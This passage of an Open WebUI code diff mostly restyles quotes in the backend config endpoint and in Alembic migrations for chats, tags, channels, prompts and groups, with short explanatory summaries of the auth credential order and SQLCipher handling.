app.state.config.CODE_EXECUTION_ENGINE, - "interpreter_engine": app.state.config.CODE_INTERPRETER_ENGINE, + 'default_models': app.state.config.DEFAULT_MODELS, + 'default_pinned_models': app.state.config.DEFAULT_PINNED_MODELS, + 'default_prompt_suggestions': app.state.config.DEFAULT_PROMPT_SUGGESTIONS, + 'user_count': user_count, + 'code': { + 'engine': app.state.config.CODE_EXECUTION_ENGINE, + 'interpreter_engine': app.state.config.CODE_INTERPRETER_ENGINE, }, - "audio": { - "tts": { - "engine": app.state.config.TTS_ENGINE, - "voice": app.state.config.TTS_VOICE, - "split_on": app.state.config.TTS_SPLIT_ON, + 'audio': { + 'tts': { + 'engine': app.state.config.TTS_ENGINE, + 'voice': app.state.config.TTS_VOICE, + 'split_on': app.state.config.TTS_SPLIT_ON, }, - "stt": { - "engine": app.state.config.STT_ENGINE, + 'stt': { + 'engine': app.state.config.STT_ENGINE, }, }, - "file": { - "max_size": app.state.config.FILE_MAX_SIZE, - "max_count": app.state.config.FILE_MAX_COUNT, - "image_compression": { - "width": app.state.config.FILE_IMAGE_COMPRESSION_WIDTH, - "height": 
app.state.config.FILE_IMAGE_COMPRESSION_HEIGHT, + 'file': { + 'max_size': app.state.config.FILE_MAX_SIZE, + 'max_count': app.state.config.FILE_MAX_COUNT, + 'image_compression': { + 'width': app.state.config.FILE_IMAGE_COMPRESSION_WIDTH, + 'height': app.state.config.FILE_IMAGE_COMPRESSION_HEIGHT, }, }, - "permissions": {**app.state.config.USER_PERMISSIONS}, - "google_drive": { - "client_id": GOOGLE_DRIVE_CLIENT_ID.value, - "api_key": GOOGLE_DRIVE_API_KEY.value, + 'permissions': {**app.state.config.USER_PERMISSIONS}, + 'google_drive': { + 'client_id': GOOGLE_DRIVE_CLIENT_ID.value, + 'api_key': GOOGLE_DRIVE_API_KEY.value, }, - "onedrive": { - "client_id_personal": ONEDRIVE_CLIENT_ID_PERSONAL, - ... [truncated]
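Both check_url and /api/config resolve credentials in the same order: Authorization header first, then the token cookie for browser sessions, and (in check_url only) the x-api-key header for the Anthropic-compatible routes. A sketch of that order; get_http_authorization_cred is assumed from open_webui.utils.auth to parse a "Bearer <token>" header into credentials:

```python
# Sketch of the credential-resolution order shared by check_url and
# /api/config, per the hunks above.
from typing import Optional

from fastapi import Request
from fastapi.security import HTTPAuthorizationCredentials

ANTHROPIC_ROUTES = ('/api/message', '/api/v1/messages')

def resolve_credentials(request: Request) -> Optional[HTTPAuthorizationCredentials]:
    cred = get_http_authorization_cred(request.headers.get('Authorization'))
    if cred is None and request.cookies.get('token'):
        # browser sessions carry the token as a cookie instead of a header
        cred = HTTPAuthorizationCredentials(
            scheme='Bearer', credentials=request.cookies.get('token')
        )
    if cred is None and request.headers.get('x-api-key'):
        # Anthropic SDKs send x-api-key; honored only on the message routes
        if request.url.path in ANTHROPIC_ROUTES:
            cred = HTTPAuthorizationCredentials(
                scheme='Bearer', credentials=request.headers.get('x-api-key')
            )
    return cred
```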
backend/open_webui/migrations/env.py+11 −13 modified

Besides requoting, the Alembic environment re-applies the JSON log formatter after fileConfig replaces the root handlers (when LOG_FORMAT is json), escapes % characters in DATABASE_URL before storing it as sqlalchemy.url, and handles SQLCipher in online migrations: a sqlite+sqlcipher:// URL requires a non-empty DATABASE_PASSWORD, the database path is extracted from the URL (dropping a leading slash for relative paths), and the engine is built from a dummy 'sqlite://' URL with a custom sqlcipher3-backed creator function (sketched below under stated assumptions); every other database keeps the standard engine_from_config path with NullPool.
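The creator body is elided by the hunk context, so this sketch fills it in under assumptions: sqlcipher3 mirrors the stdlib sqlite3 DB-API, and the key is applied with a PRAGMA on each new connection (the passphrase is assumed to contain no single quotes; real code should escape it). What the hunk does confirm is the dummy-URL-plus-creator wiring.

```python
# Sketch filling in the elided creator body; db_path and DATABASE_PASSWORD
# come from the surrounding migration code shown above.
import sqlcipher3
from sqlalchemy import create_engine

def create_sqlcipher_connection():
    conn = sqlcipher3.connect(db_path)  # db_path parsed from the sqlcipher URL
    conn.execute(f"PRAGMA key = '{DATABASE_PASSWORD}'")  # assumption: key pragma
    return conn

# Confirmed by the hunk: SQLAlchemy is given a dummy URL and pulls every
# connection from the creator instead.
connectable = create_engine('sqlite://', creator=create_sqlcipher_connection, echo=False)
```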
backend/open_webui/migrations/util.py+1 −1 modified

A single requoted line: get_revision_id still returns the first 12 characters of a dash-stripped uuid4.
backend/open_webui/migrations/versions/018012973d35_add_indexes.py+16 −16 modified

Quote restyling only. The migration still creates, and drops on downgrade, the chat indexes on folder_id, (user_id, pinned), (user_id, archived), (updated_at, user_id), and (folder_id, user_id), plus user_id on tag and is_global on function.
backend/open_webui/migrations/versions/1af9b942657b_migrate_tags.py+37 −48 modified

Reflowed rather than rewritten. The migration first drops any leftover _alembic_tmp_tag table from earlier failed runs, then batch-alters tag for SQLite compatibility: it adds the uq_id_user_id unique constraint on (id, user_id) if missing, drops the data column, and adds a meta JSON column. Tag ids are normalized to the lower-cased, underscore-joined form of the tag name (sketched below); a tag named pinned is deleted outright, and when the normalized id collides with an existing row the current tag is deleted to avoid duplicates. It then adds pinned and meta columns to chat and replays the old chatidtag rows into them: a pinned tag sets pinned=True on the chat, and every other tag is de-duplicated into meta['tags'].
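The id rule and its edge cases in one place, as a sketch:

```python
# Sketch of the normalization rule above; 'pinned' is special-cased into a
# chat flag, and an id collision drops the row being renamed.
def normalize_tag_id(name: str) -> str:
    return name.replace(' ', '_').lower()

assert normalize_tag_id('Side Projects') == 'side_projects'
```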
backend/open_webui/migrations/versions/242a2047eae0_update_chat_table.py+24 −34 modified@@ -12,8 +12,8 @@ import json -revision = "242a2047eae0" -down_revision = "6a39f3d8e55c" +revision = '242a2047eae0' +down_revision = '6a39f3d8e55c' branch_labels = None depends_on = None @@ -22,39 +22,37 @@ def upgrade(): conn = op.get_bind() inspector = sa.inspect(conn) - columns = inspector.get_columns("chat") - column_dict = {col["name"]: col for col in columns} + columns = inspector.get_columns('chat') + column_dict = {col['name']: col for col in columns} - chat_column = column_dict.get("chat") - old_chat_exists = "old_chat" in column_dict + chat_column = column_dict.get('chat') + old_chat_exists = 'old_chat' in column_dict if chat_column: - if isinstance(chat_column["type"], sa.Text): + if isinstance(chat_column['type'], sa.Text): print("Converting 'chat' column to JSON") if old_chat_exists: print("Dropping old 'old_chat' column") - op.drop_column("chat", "old_chat") + op.drop_column('chat', 'old_chat') # Step 1: Rename current 'chat' column to 'old_chat' print("Renaming 'chat' column to 'old_chat'") - op.alter_column( - "chat", "chat", new_column_name="old_chat", existing_type=sa.Text() - ) + op.alter_column('chat', 'chat', new_column_name='old_chat', existing_type=sa.Text()) # Step 2: Add new 'chat' column of type JSON print("Adding new 'chat' column of type JSON") - op.add_column("chat", sa.Column("chat", sa.JSON(), nullable=True)) + op.add_column('chat', sa.Column('chat', sa.JSON(), nullable=True)) else: # If the column is already JSON, no need to do anything pass # Step 3: Migrate data from 'old_chat' to 'chat' chat_table = table( - "chat", - sa.Column("id", sa.String(), primary_key=True), - sa.Column("old_chat", sa.Text()), - sa.Column("chat", sa.JSON()), + 'chat', + sa.Column('id', sa.String(), primary_key=True), + sa.Column('old_chat', sa.Text()), + sa.Column('chat', sa.JSON()), ) # - Selecting all data from the table @@ -67,41 +65,33 @@ def upgrade(): except json.JSONDecodeError: json_data = None # Handle cases where the text cannot be converted to JSON - connection.execute( - sa.update(chat_table) - .where(chat_table.c.id == row.id) - .values(chat=json_data) - ) + connection.execute(sa.update(chat_table).where(chat_table.c.id == row.id).values(chat=json_data)) # Step 4: Drop 'old_chat' column print("Dropping 'old_chat' column") - op.drop_column("chat", "old_chat") + op.drop_column('chat', 'old_chat') def downgrade(): # Step 1: Add 'old_chat' column back as Text - op.add_column("chat", sa.Column("old_chat", sa.Text(), nullable=True)) + op.add_column('chat', sa.Column('old_chat', sa.Text(), nullable=True)) # Step 2: Convert 'chat' JSON data back to text and store in 'old_chat' chat_table = table( - "chat", - sa.Column("id", sa.String(), primary_key=True), - sa.Column("chat", sa.JSON()), - sa.Column("old_chat", sa.Text()), + 'chat', + sa.Column('id', sa.String(), primary_key=True), + sa.Column('chat', sa.JSON()), + sa.Column('old_chat', sa.Text()), ) connection = op.get_bind() results = connection.execute(select(chat_table.c.id, chat_table.c.chat)) for row in results: text_data = json.dumps(row.chat) if row.chat is not None else None - connection.execute( - sa.update(chat_table) - .where(chat_table.c.id == row.id) - .values(old_chat=text_data) - ) + connection.execute(sa.update(chat_table).where(chat_table.c.id == row.id).values(old_chat=text_data)) # Step 3: Remove the new 'chat' JSON column - op.drop_column("chat", "chat") + op.drop_column('chat', 'chat') # Step 4: Rename 'old_chat' back 
to 'chat' - op.alter_column("chat", "old_chat", new_column_name="chat", existing_type=sa.Text()) + op.alter_column('chat', 'old_chat', new_column_name='chat', existing_type=sa.Text())
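The rename → add → backfill → drop sequence in 242a2047eae0 is the portable way to change a column's type when values need row-by-row conversion. Condensed into one helper (a sketch under the same assumptions as the diff: an 'id' primary key, and rows that fail JSON parsing deliberately becoming NULL):

    import json
    import sqlalchemy as sa
    from alembic import op
    from sqlalchemy.sql import table

    def text_column_to_json(table_name='chat', col='chat'):
        old = 'old_' + col
        # 1. Park the existing Text column under a temporary name.
        op.alter_column(table_name, col, new_column_name=old, existing_type=sa.Text())
        # 2. Recreate the column with the target JSON type.
        op.add_column(table_name, sa.Column(col, sa.JSON(), nullable=True))

        t = table(
            table_name,
            sa.Column('id', sa.String(), primary_key=True),
            sa.Column(old, sa.Text()),
            sa.Column(col, sa.JSON()),
        )
        conn = op.get_bind()
        # 3. Convert row by row; anything that is not valid JSON becomes NULL.
        for row_id, raw in conn.execute(sa.select(t.c.id, t.c[old])):
            try:
                value = json.loads(raw) if raw is not None else None
            except json.JSONDecodeError:
                value = None
            conn.execute(sa.update(t).where(t.c.id == row_id).values({col: value}))
        # 4. Drop the parked Text column.
        op.drop_column(table_name, old)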
backend/open_webui/migrations/versions/2f1211949ecc_update_message_and_channel_member_table.py+28 −36 modified@@ -13,19 +13,19 @@ import open_webui.internal.db # revision identifiers, used by Alembic. -revision: str = "2f1211949ecc" -down_revision: Union[str, None] = "37f288994c47" +revision: str = '2f1211949ecc' +down_revision: Union[str, None] = '37f288994c47' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None def upgrade() -> None: # New columns to be added to channel_member table - op.add_column("channel_member", sa.Column("status", sa.Text(), nullable=True)) + op.add_column('channel_member', sa.Column('status', sa.Text(), nullable=True)) op.add_column( - "channel_member", + 'channel_member', sa.Column( - "is_active", + 'is_active', sa.Boolean(), nullable=False, default=True, @@ -34,69 +34,61 @@ def upgrade() -> None: ) op.add_column( - "channel_member", + 'channel_member', sa.Column( - "is_channel_muted", + 'is_channel_muted', sa.Boolean(), nullable=False, default=False, server_default=sa.sql.expression.false(), ), ) op.add_column( - "channel_member", + 'channel_member', sa.Column( - "is_channel_pinned", + 'is_channel_pinned', sa.Boolean(), nullable=False, default=False, server_default=sa.sql.expression.false(), ), ) - op.add_column("channel_member", sa.Column("data", sa.JSON(), nullable=True)) - op.add_column("channel_member", sa.Column("meta", sa.JSON(), nullable=True)) + op.add_column('channel_member', sa.Column('data', sa.JSON(), nullable=True)) + op.add_column('channel_member', sa.Column('meta', sa.JSON(), nullable=True)) - op.add_column( - "channel_member", sa.Column("joined_at", sa.BigInteger(), nullable=False) - ) - op.add_column( - "channel_member", sa.Column("left_at", sa.BigInteger(), nullable=True) - ) + op.add_column('channel_member', sa.Column('joined_at', sa.BigInteger(), nullable=False)) + op.add_column('channel_member', sa.Column('left_at', sa.BigInteger(), nullable=True)) - op.add_column( - "channel_member", sa.Column("last_read_at", sa.BigInteger(), nullable=True) - ) + op.add_column('channel_member', sa.Column('last_read_at', sa.BigInteger(), nullable=True)) - op.add_column( - "channel_member", sa.Column("updated_at", sa.BigInteger(), nullable=True) - ) + op.add_column('channel_member', sa.Column('updated_at', sa.BigInteger(), nullable=True)) # New columns to be added to message table op.add_column( - "message", + 'message', sa.Column( - "is_pinned", + 'is_pinned', sa.Boolean(), nullable=False, default=False, server_default=sa.sql.expression.false(), ), ) - op.add_column("message", sa.Column("pinned_at", sa.BigInteger(), nullable=True)) - op.add_column("message", sa.Column("pinned_by", sa.Text(), nullable=True)) + op.add_column('message', sa.Column('pinned_at', sa.BigInteger(), nullable=True)) + op.add_column('message', sa.Column('pinned_by', sa.Text(), nullable=True)) def downgrade() -> None: - op.drop_column("channel_member", "updated_at") - op.drop_column("channel_member", "last_read_at") + op.drop_column('channel_member', 'updated_at') + op.drop_column('channel_member', 'last_read_at') - op.drop_column("channel_member", "meta") - op.drop_column("channel_member", "data") + op.drop_column('channel_member', 'meta') + op.drop_column('channel_member', 'data') - op.drop_column("channel_member", "is_channel_pinned") - op.drop_column("channel_member", "is_channel_muted") + op.drop_column('channel_member', 'is_channel_pinned') + op.drop_column('channel_member', 'is_channel_muted') - op.drop_column("message", 
"pinned_by") - op.drop_column("message", "pinned_at") - op.drop_column("message", "is_pinned") + op.drop_column('message', 'pinned_by') + op.drop_column('message', 'pinned_at') + op.drop_column('message', 'is_pinned')
backend/open_webui/migrations/versions/374d2f66af06_add_prompt_history_table.py+87 −89 modified@@ -12,8 +12,8 @@ from alembic import op import sqlalchemy as sa -revision: str = "374d2f66af06" -down_revision: Union[str, None] = "c440947495f3" +revision: str = '374d2f66af06' +down_revision: Union[str, None] = 'c440947495f3' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None @@ -26,13 +26,13 @@ def upgrade() -> None: # We need to assume the OLD structure. old_prompt_table = sa.table( - "prompt", - sa.column("command", sa.Text()), - sa.column("user_id", sa.Text()), - sa.column("title", sa.Text()), - sa.column("content", sa.Text()), - sa.column("timestamp", sa.BigInteger()), - sa.column("access_control", sa.JSON()), + 'prompt', + sa.column('command', sa.Text()), + sa.column('user_id', sa.Text()), + sa.column('title', sa.Text()), + sa.column('content', sa.Text()), + sa.column('timestamp', sa.BigInteger()), + sa.column('access_control', sa.JSON()), ) # Check if table exists/read data @@ -53,61 +53,61 @@ def upgrade() -> None: # Step 2: Create new prompt table with 'id' as PRIMARY KEY op.create_table( - "prompt_new", - sa.Column("id", sa.Text(), primary_key=True), - sa.Column("command", sa.String(), unique=True, index=True), - sa.Column("user_id", sa.String(), nullable=False), - sa.Column("name", sa.Text(), nullable=False), - sa.Column("content", sa.Text(), nullable=False), - sa.Column("data", sa.JSON(), nullable=True), - sa.Column("meta", sa.JSON(), nullable=True), - sa.Column("access_control", sa.JSON(), nullable=True), - sa.Column("is_active", sa.Boolean(), nullable=False, server_default="1"), - sa.Column("version_id", sa.Text(), nullable=True), - sa.Column("tags", sa.JSON(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=False), - sa.Column("updated_at", sa.BigInteger(), nullable=False), + 'prompt_new', + sa.Column('id', sa.Text(), primary_key=True), + sa.Column('command', sa.String(), unique=True, index=True), + sa.Column('user_id', sa.String(), nullable=False), + sa.Column('name', sa.Text(), nullable=False), + sa.Column('content', sa.Text(), nullable=False), + sa.Column('data', sa.JSON(), nullable=True), + sa.Column('meta', sa.JSON(), nullable=True), + sa.Column('access_control', sa.JSON(), nullable=True), + sa.Column('is_active', sa.Boolean(), nullable=False, server_default='1'), + sa.Column('version_id', sa.Text(), nullable=True), + sa.Column('tags', sa.JSON(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=False), + sa.Column('updated_at', sa.BigInteger(), nullable=False), ) # Step 3: Create prompt_history table op.create_table( - "prompt_history", - sa.Column("id", sa.Text(), primary_key=True), - sa.Column("prompt_id", sa.Text(), nullable=False, index=True), - sa.Column("parent_id", sa.Text(), nullable=True), - sa.Column("snapshot", sa.JSON(), nullable=False), - sa.Column("user_id", sa.Text(), nullable=False), - sa.Column("commit_message", sa.Text(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=False), + 'prompt_history', + sa.Column('id', sa.Text(), primary_key=True), + sa.Column('prompt_id', sa.Text(), nullable=False, index=True), + sa.Column('parent_id', sa.Text(), nullable=True), + sa.Column('snapshot', sa.JSON(), nullable=False), + sa.Column('user_id', sa.Text(), nullable=False), + sa.Column('commit_message', sa.Text(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=False), ) # Step 4: Migrate data prompt_new_table = sa.table( - "prompt_new", - 
sa.column("id", sa.Text()), - sa.column("command", sa.String()), - sa.column("user_id", sa.String()), - sa.column("name", sa.Text()), - sa.column("content", sa.Text()), - sa.column("data", sa.JSON()), - sa.column("meta", sa.JSON()), - sa.column("access_control", sa.JSON()), - sa.column("is_active", sa.Boolean()), - sa.column("version_id", sa.Text()), - sa.column("tags", sa.JSON()), - sa.column("created_at", sa.BigInteger()), - sa.column("updated_at", sa.BigInteger()), + 'prompt_new', + sa.column('id', sa.Text()), + sa.column('command', sa.String()), + sa.column('user_id', sa.String()), + sa.column('name', sa.Text()), + sa.column('content', sa.Text()), + sa.column('data', sa.JSON()), + sa.column('meta', sa.JSON()), + sa.column('access_control', sa.JSON()), + sa.column('is_active', sa.Boolean()), + sa.column('version_id', sa.Text()), + sa.column('tags', sa.JSON()), + sa.column('created_at', sa.BigInteger()), + sa.column('updated_at', sa.BigInteger()), ) prompt_history_table = sa.table( - "prompt_history", - sa.column("id", sa.Text()), - sa.column("prompt_id", sa.Text()), - sa.column("parent_id", sa.Text()), - sa.column("snapshot", sa.JSON()), - sa.column("user_id", sa.Text()), - sa.column("commit_message", sa.Text()), - sa.column("created_at", sa.BigInteger()), + 'prompt_history', + sa.column('id', sa.Text()), + sa.column('prompt_id', sa.Text()), + sa.column('parent_id', sa.Text()), + sa.column('snapshot', sa.JSON()), + sa.column('user_id', sa.Text()), + sa.column('commit_message', sa.Text()), + sa.column('created_at', sa.BigInteger()), ) for row in existing_prompts: @@ -120,7 +120,7 @@ def upgrade() -> None: new_uuid = str(uuid.uuid4()) history_uuid = str(uuid.uuid4()) - clean_command = command[1:] if command and command.startswith("/") else command + clean_command = command[1:] if command and command.startswith('/') else command # Insert into prompt_new conn.execute( @@ -148,12 +148,12 @@ def upgrade() -> None: prompt_id=new_uuid, parent_id=None, snapshot={ - "name": title, - "content": content, - "command": clean_command, - "data": {}, - "meta": {}, - "access_control": access_control, + 'name': title, + 'content': content, + 'command': clean_command, + 'data': {}, + 'meta': {}, + 'access_control': access_control, }, user_id=user_id, commit_message=None, @@ -162,22 +162,22 @@ def upgrade() -> None: ) # Step 5: Replace old table with new one - op.drop_table("prompt") - op.rename_table("prompt_new", "prompt") + op.drop_table('prompt') + op.rename_table('prompt_new', 'prompt') def downgrade() -> None: conn = op.get_bind() # Step 1: Read new data prompt_table = sa.table( - "prompt", - sa.column("command", sa.String()), - sa.column("name", sa.Text()), - sa.column("created_at", sa.BigInteger()), - sa.column("user_id", sa.Text()), - sa.column("content", sa.Text()), - sa.column("access_control", sa.JSON()), + 'prompt', + sa.column('command', sa.String()), + sa.column('name', sa.Text()), + sa.column('created_at', sa.BigInteger()), + sa.column('user_id', sa.Text()), + sa.column('content', sa.Text()), + sa.column('access_control', sa.JSON()), ) try: @@ -195,31 +195,31 @@ def downgrade() -> None: current_data = [] # Step 2: Drop history and table - op.drop_table("prompt_history") - op.drop_table("prompt") + op.drop_table('prompt_history') + op.drop_table('prompt') # Step 3: Recreate old table (command as PK?) 
# Assuming old schema: op.create_table( - "prompt", - sa.Column("command", sa.String(), primary_key=True), - sa.Column("user_id", sa.String()), - sa.Column("title", sa.Text()), - sa.Column("content", sa.Text()), - sa.Column("timestamp", sa.BigInteger()), - sa.Column("access_control", sa.JSON()), - sa.Column("id", sa.Integer(), nullable=True), + 'prompt', + sa.Column('command', sa.String(), primary_key=True), + sa.Column('user_id', sa.String()), + sa.Column('title', sa.Text()), + sa.Column('content', sa.Text()), + sa.Column('timestamp', sa.BigInteger()), + sa.Column('access_control', sa.JSON()), + sa.Column('id', sa.Integer(), nullable=True), ) # Step 4: Restore data old_prompt_table = sa.table( - "prompt", - sa.column("command", sa.String()), - sa.column("user_id", sa.String()), - sa.column("title", sa.Text()), - sa.column("content", sa.Text()), - sa.column("timestamp", sa.BigInteger()), - sa.column("access_control", sa.JSON()), + 'prompt', + sa.column('command', sa.String()), + sa.column('user_id', sa.String()), + sa.column('title', sa.Text()), + sa.column('content', sa.Text()), + sa.column('timestamp', sa.BigInteger()), + sa.column('access_control', sa.JSON()), ) for row in current_data: @@ -231,9 +231,7 @@ def downgrade() -> None: access_control = row[5] # Restore leading / - old_command = ( - "/" + command if command and not command.startswith("/") else command - ) + old_command = '/' + command if command and not command.startswith('/') else command conn.execute( sa.insert(old_prompt_table).values(
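One behavioral detail in the prompt migration above: upgrade strips the leading '/' from command, and downgrade puts it back. Extracted as a pair of helpers (illustrative names, not from the patch), the round-trip is lossless only for commands that originally started with '/':

    from typing import Optional

    def strip_slash(command: Optional[str]) -> Optional[str]:
        # upgrade direction: '/summarize' -> 'summarize'
        return command[1:] if command and command.startswith('/') else command

    def restore_slash(command: Optional[str]) -> Optional[str]:
        # downgrade direction: 'summarize' -> '/summarize'
        return '/' + command if command and not command.startswith('/') else command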
backend/open_webui/migrations/versions/3781e22d8b01_update_message_table.py+21 −33 modified@@ -9,62 +9,50 @@ from alembic import op import sqlalchemy as sa -revision = "3781e22d8b01" -down_revision = "7826ab40b532" +revision = '3781e22d8b01' +down_revision = '7826ab40b532' branch_labels = None depends_on = None def upgrade(): # Add 'type' column to the 'channel' table op.add_column( - "channel", + 'channel', sa.Column( - "type", + 'type', sa.Text(), nullable=True, ), ) # Add 'parent_id' column to the 'message' table for threads op.add_column( - "message", - sa.Column("parent_id", sa.Text(), nullable=True), + 'message', + sa.Column('parent_id', sa.Text(), nullable=True), ) op.create_table( - "message_reaction", - sa.Column( - "id", sa.Text(), nullable=False, primary_key=True, unique=True - ), # Unique reaction ID - sa.Column("user_id", sa.Text(), nullable=False), # User who reacted - sa.Column( - "message_id", sa.Text(), nullable=False - ), # Message that was reacted to - sa.Column( - "name", sa.Text(), nullable=False - ), # Reaction name (e.g. "thumbs_up") - sa.Column( - "created_at", sa.BigInteger(), nullable=True - ), # Timestamp of when the reaction was added + 'message_reaction', + sa.Column('id', sa.Text(), nullable=False, primary_key=True, unique=True), # Unique reaction ID + sa.Column('user_id', sa.Text(), nullable=False), # User who reacted + sa.Column('message_id', sa.Text(), nullable=False), # Message that was reacted to + sa.Column('name', sa.Text(), nullable=False), # Reaction name (e.g. "thumbs_up") + sa.Column('created_at', sa.BigInteger(), nullable=True), # Timestamp of when the reaction was added ) op.create_table( - "channel_member", - sa.Column( - "id", sa.Text(), nullable=False, primary_key=True, unique=True - ), # Record ID for the membership row - sa.Column("channel_id", sa.Text(), nullable=False), # Associated channel - sa.Column("user_id", sa.Text(), nullable=False), # Associated user - sa.Column( - "created_at", sa.BigInteger(), nullable=True - ), # Timestamp of when the user joined the channel + 'channel_member', + sa.Column('id', sa.Text(), nullable=False, primary_key=True, unique=True), # Record ID for the membership row + sa.Column('channel_id', sa.Text(), nullable=False), # Associated channel + sa.Column('user_id', sa.Text(), nullable=False), # Associated user + sa.Column('created_at', sa.BigInteger(), nullable=True), # Timestamp of when the user joined the channel ) def downgrade(): # Revert 'type' column addition to the 'channel' table - op.drop_column("channel", "type") - op.drop_column("message", "parent_id") - op.drop_table("message_reaction") - op.drop_table("channel_member") + op.drop_column('channel', 'type') + op.drop_column('message', 'parent_id') + op.drop_table('message_reaction') + op.drop_table('channel_member')
backend/open_webui/migrations/versions/37f288994c47_add_group_member_table.py+41 −49 modified@@ -15,59 +15,57 @@ import sqlalchemy as sa # revision identifiers, used by Alembic. -revision: str = "37f288994c47" -down_revision: Union[str, None] = "a5c220713937" +revision: str = '37f288994c47' +down_revision: Union[str, None] = 'a5c220713937' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None def upgrade() -> None: # 1. Create new table op.create_table( - "group_member", - sa.Column("id", sa.Text(), primary_key=True, unique=True, nullable=False), + 'group_member', + sa.Column('id', sa.Text(), primary_key=True, unique=True, nullable=False), sa.Column( - "group_id", + 'group_id', sa.Text(), - sa.ForeignKey("group.id", ondelete="CASCADE"), + sa.ForeignKey('group.id', ondelete='CASCADE'), nullable=False, ), sa.Column( - "user_id", + 'user_id', sa.Text(), - sa.ForeignKey("user.id", ondelete="CASCADE"), + sa.ForeignKey('user.id', ondelete='CASCADE'), nullable=False, ), - sa.Column("created_at", sa.BigInteger(), nullable=True), - sa.Column("updated_at", sa.BigInteger(), nullable=True), - sa.UniqueConstraint("group_id", "user_id", name="uq_group_member_group_user"), + sa.Column('created_at', sa.BigInteger(), nullable=True), + sa.Column('updated_at', sa.BigInteger(), nullable=True), + sa.UniqueConstraint('group_id', 'user_id', name='uq_group_member_group_user'), ) connection = op.get_bind() # 2. Read existing group with user_ids JSON column group_table = sa.Table( - "group", + 'group', sa.MetaData(), - sa.Column("id", sa.Text()), - sa.Column("user_ids", sa.JSON()), # JSON stored as text in SQLite + PG + sa.Column('id', sa.Text()), + sa.Column('user_ids', sa.JSON()), # JSON stored as text in SQLite + PG ) - results = connection.execute( - sa.select(group_table.c.id, group_table.c.user_ids) - ).fetchall() + results = connection.execute(sa.select(group_table.c.id, group_table.c.user_ids)).fetchall() print(results) # 3. Insert members into group_member table gm_table = sa.Table( - "group_member", + 'group_member', sa.MetaData(), - sa.Column("id", sa.Text()), - sa.Column("group_id", sa.Text()), - sa.Column("user_id", sa.Text()), - sa.Column("created_at", sa.BigInteger()), - sa.Column("updated_at", sa.BigInteger()), + sa.Column('id', sa.Text()), + sa.Column('group_id', sa.Text()), + sa.Column('user_id', sa.Text()), + sa.Column('created_at', sa.BigInteger()), + sa.Column('updated_at', sa.BigInteger()), ) now = int(time.time()) @@ -86,11 +84,11 @@ def upgrade() -> None: rows = [ { - "id": str(uuid.uuid4()), - "group_id": group_id, - "user_id": uid, - "created_at": now, - "updated_at": now, + 'id': str(uuid.uuid4()), + 'group_id': group_id, + 'user_id': uid, + 'created_at': now, + 'updated_at': now, } for uid in user_ids ] @@ -99,47 +97,41 @@ def upgrade() -> None: connection.execute(gm_table.insert(), rows) # 4. 
Optionally drop the old column - with op.batch_alter_table("group") as batch: - batch.drop_column("user_ids") + with op.batch_alter_table('group') as batch: + batch.drop_column('user_ids') def downgrade(): # Reverse: restore user_ids column - with op.batch_alter_table("group") as batch: - batch.add_column(sa.Column("user_ids", sa.JSON())) + with op.batch_alter_table('group') as batch: + batch.add_column(sa.Column('user_ids', sa.JSON())) connection = op.get_bind() gm_table = sa.Table( - "group_member", + 'group_member', sa.MetaData(), - sa.Column("group_id", sa.Text()), - sa.Column("user_id", sa.Text()), - sa.Column("created_at", sa.BigInteger()), - sa.Column("updated_at", sa.BigInteger()), + sa.Column('group_id', sa.Text()), + sa.Column('user_id', sa.Text()), + sa.Column('created_at', sa.BigInteger()), + sa.Column('updated_at', sa.BigInteger()), ) group_table = sa.Table( - "group", + 'group', sa.MetaData(), - sa.Column("id", sa.Text()), - sa.Column("user_ids", sa.JSON()), + sa.Column('id', sa.Text()), + sa.Column('user_ids', sa.JSON()), ) # Build JSON arrays again results = connection.execute(sa.select(group_table.c.id)).fetchall() for (group_id,) in results: - members = connection.execute( - sa.select(gm_table.c.user_id).where(gm_table.c.group_id == group_id) - ).fetchall() + members = connection.execute(sa.select(gm_table.c.user_id).where(gm_table.c.group_id == group_id)).fetchall() member_ids = [m[0] for m in members] - connection.execute( - group_table.update() - .where(group_table.c.id == group_id) - .values(user_ids=member_ids) - ) + connection.execute(group_table.update().where(group_table.c.id == group_id).values(user_ids=member_ids)) # Drop the new table - op.drop_table("group_member") + op.drop_table('group_member')
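The group_member backfill above fans a JSON array column out into one row per (group, user) pair, then drops the array. A sketch of just the fan-out, keeping the diff's timestamp and UUID conventions (fan_out_members is a hypothetical helper name; group_table and gm_table are the lightweight sa.Table handles defined in the migration):

    import time
    import uuid
    import sqlalchemy as sa

    def fan_out_members(conn, group_table, gm_table):
        now = int(time.time())
        for group_id, user_ids in conn.execute(sa.select(group_table.c.id, group_table.c.user_ids)):
            if not user_ids:
                continue  # NULL or empty array: nothing to migrate
            rows = [
                {
                    'id': str(uuid.uuid4()),
                    'group_id': group_id,
                    'user_id': uid,
                    'created_at': now,
                    'updated_at': now,
                }
                for uid in user_ids
            ]
            conn.execute(gm_table.insert(), rows)  # single executemany per group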
backend/open_webui/migrations/versions/38d63c18f30f_add_oauth_session_table.py+30 −34 modified@@ -12,68 +12,64 @@ import sqlalchemy as sa # revision identifiers, used by Alembic. -revision: str = "38d63c18f30f" -down_revision: Union[str, None] = "3af16a1c9fb6" +revision: str = '38d63c18f30f' +down_revision: Union[str, None] = '3af16a1c9fb6' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None def upgrade() -> None: # Ensure 'id' column in 'user' table is unique and primary key (ForeignKey constraint) inspector = sa.inspect(op.get_bind()) - columns = inspector.get_columns("user") + columns = inspector.get_columns('user') - pk_columns = inspector.get_pk_constraint("user")["constrained_columns"] - id_column = next((col for col in columns if col["name"] == "id"), None) + pk_columns = inspector.get_pk_constraint('user')['constrained_columns'] + id_column = next((col for col in columns if col['name'] == 'id'), None) - if id_column and not id_column.get("unique", False): - unique_constraints = inspector.get_unique_constraints("user") - unique_columns = {tuple(u["column_names"]) for u in unique_constraints} + if id_column and not id_column.get('unique', False): + unique_constraints = inspector.get_unique_constraints('user') + unique_columns = {tuple(u['column_names']) for u in unique_constraints} - with op.batch_alter_table("user") as batch_op: + with op.batch_alter_table('user') as batch_op: # If primary key is wrong, drop it - if pk_columns and pk_columns != ["id"]: - batch_op.drop_constraint( - 